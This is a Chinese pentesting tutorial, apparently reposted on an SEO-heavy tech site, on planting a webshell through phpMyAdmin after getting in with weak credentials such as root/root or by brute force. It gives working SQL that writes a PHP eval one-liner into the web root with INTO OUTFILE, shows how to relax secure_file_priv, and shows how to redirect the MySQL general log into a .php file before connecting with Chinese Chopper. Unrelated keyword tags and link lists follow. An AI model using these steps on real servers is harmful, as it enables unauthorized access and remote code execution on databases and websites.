PhpMyAdmin后台getshell（渗透测试）

---

下面由phpmyadmin教程栏目给大家介绍phpmyadmin后台getshell（渗透测试），希望对需要的朋友有所帮助！

PhpMyAdmin简介

PhpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。

在通过对目标进行信息收集探测后，当发现存有phpmyadmin目录（可试下：http://ip:端口/phpmyadmin/ ）时，进而通过弱口令（可以直接尝试下账号root密码root）或者暴力破解进入管理后台之后，有多种方法进行getshell。

into outfile导出木马

想在网站内部插入木马，前提是你得知道网站的绝对路径，方法也有很多，比如通过报错获取路径，通过phpinfo.php等等（可参考另一篇博文：https://blog.csdn.net/weixin_39190897/article/details/99078864 ）。

最方便的是用select @@basedir;直接查（但有时没法查出来，只能另寻它法）：

根据上面的反馈，我们可以看到 MySQL 的位置在 D:\soft\phpStudy\MySQL\目录下。

获得网站路径后就可以企图上传木马了，最常用的是通过into outfile在网站根目录上直接写入一句话木马：

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';

SONIFY.io

设计和开发音频优先的产品和数据驱动的解决方案

83 查看详情

但在新版的mysql中，这句话并没有运行成功。

Mysql新特性secure_file_priv会对读写文件产生影响，该参数用来限制导入导出。我们可以借助show global variables like '%secure%';命令来查看该参数：

当secure_file_priv为NULL时，表示限制Mysql不允许导入导出，所以爆出错误。要想使得该语句导出成功，则需要在Mysql文件夹下修改my.ini 文件，在[mysqld]内加入secure_file_priv ="" 即可:

当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制，此时就可以执行导出命令。

利用Mysql日志文件

Mysql 5.0版本以上会创建日志文件，通过修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。（注：linux因为权限问题亲测没有成功）。先来介绍两个MySQL全局变量：general_log 和 general_log file。

1. general log 指的是日志保存状态，ON代表开启 OFF代表关闭；
2. general log file 指的是日志的保存路径。

查看日志状态的命令：show variables like '%general%';

在以上配置中，当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件。

那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成，进而getshell。

对应就会生成xxx.php文件

将一句话木马写入xxx.php文件：SELECT '<?php eval($_POST["cmd"]);?>'

接着可以看到日志文件中记录了木马语句：
最后中国菜刀连接，getshell：

以上就是PhpMyAdmin后台getshell（渗透测试）的详细内容，更多请关注其它相关文章！

# 看表  # 南通网站专题优化  # 谷歌网站建设专业  # 商丘网站建设方面有哪些  # SEO蜘蛛池效果大吗  # 鹰潭市seo咨询  # 安徽网站优化价格咨询  # 营销推广策略怎样收费  # 杭州网站关键词优化软件  # 郑州seo技术博客官网  # 关键词网站按天优化投放  # phpmyadmin  # 就可以  # 指的是  # 句话  # 分页  # 可以看到  # 就会  # 的是  # 插入图片  # 在这里 

相关栏目： 【 Google疑问12 】 【 Facebook疑问10 】 【 优化推广96088 】 【 技术知识133117 】 【 IDC资讯59369 】 【 网络运营7196 】 【 IT资讯61894 】

相关推荐： BunnyStream TUS视频上传指南：解决401认证错误与参数配置  如何编写一个符合 composer 规范的 post-install-cmd 脚本？  狙击外星人小游戏在线链接_狙击外星人小游戏网页链接  TikTok私信无法发送表情怎么办 TikTok消息表情发送修复方法  TikTok网页版入口快速访问 TikTok官网账号登录方法  《磁力猫》最好用的磁官网  泰拉瑞亚水晶无法放置问题  如何解决Casbin日志与应用日志不统一的问题，使用casbin/psr3-bridge实现无缝集成  顺丰速运官网查询入口 顺丰物流查询官网入口链接  Sublime怎么快速复制文件路径_Sublime右键菜单增强技巧  mysql导入sql文件能分批导入吗_mysql分批次导入大sql文件的实用技巧  Dash应用中自定义HTML页面标题与网站图标（F*icon）的实用指南  《密马》发布账号方法  VS Code中的Tailwind CSS IntelliSense插件使用技巧  《蓝色星原：旅谣》坐骑获取攻略  嘴唇干裂起皮怎么办 唇部护理与预防干裂的方法【详解】  Highcharts雷达图径向轴数值标签实现教程  电脑的“恢复环境(WinRE)”找不到怎么办_Windows系统恢复环境重建【高级修复】  Firefox OS应用开发：解决XMLHttpRequest跨域请求阻塞问题  《海贝音乐》均衡器设置方法  PySimpleGUI中实现键盘按键与按钮事件绑定教程  Pandas中基于动态偏移量实现DataFrame列值位移的策略  Win11如何分屏操作_Win11多窗口分屏技巧  空腹吃苹果好吗 苹果空腹摄入指南  使用VS Code作为你的个人知识管理系统  微信朋友圈怎么设置三天可见 微信朋友圈设置指定天数可见步骤【教程】  抖音火山版如何进行提现  TikTok视频播放中断怎么办 TikTok播放异常修复方法  C++ switch case字符串_C++如何实现字符串switch匹配  纯CSS实现滚动时动态时间轴线条颜色填充效果  快手网页版官方访问 快手网页版页面在线打开  掌握产品代码正则表达式：避免常见陷阱与精确匹配  PHP utf8_encode 字符编码转换陷阱与解决方案  猫眼电影app如何参与官方的抽奖活动_猫眼电影官方抽奖参与方法  《长生：天机降世》火塔小怪大全  mysql归档数据怎么导出为csv_mysql归档数据导出为csv文件的方法  C++ optional用法详解_C++17处理可能为空的返回值  消除网页顶部意外空白线：CSS布局常见问题与解决方案  电脑桌面图标怎么变大变小_Windows个性化设置第一课【新手入门】  百度小说看书时如何翻页_百度小说手动翻页与自动翻页设置  J*a中导出MySQL表为SQL脚本的两种方法  除了Copilot，还有哪些值得一试的VS Code AI插件？  电脑“无法访问指定设备、路径或文件”怎么办？五种权限设置方法  口腔诊所管理软件推荐  豆包AI怎样为教育场景定制答疑逻辑_为教育场景定制豆包AI答疑逻辑方案【方案】  如何通过settings.json个性化您的VS Code体验  邦丰播放器频道搜索设置  C#解析并修改XML后保存 如何确保格式与编码的正确性  《爱笔思画x》涂色教程  视频号视频怎么免费保存到相册？保存到相册需要注意什么？ 

 2021-06-17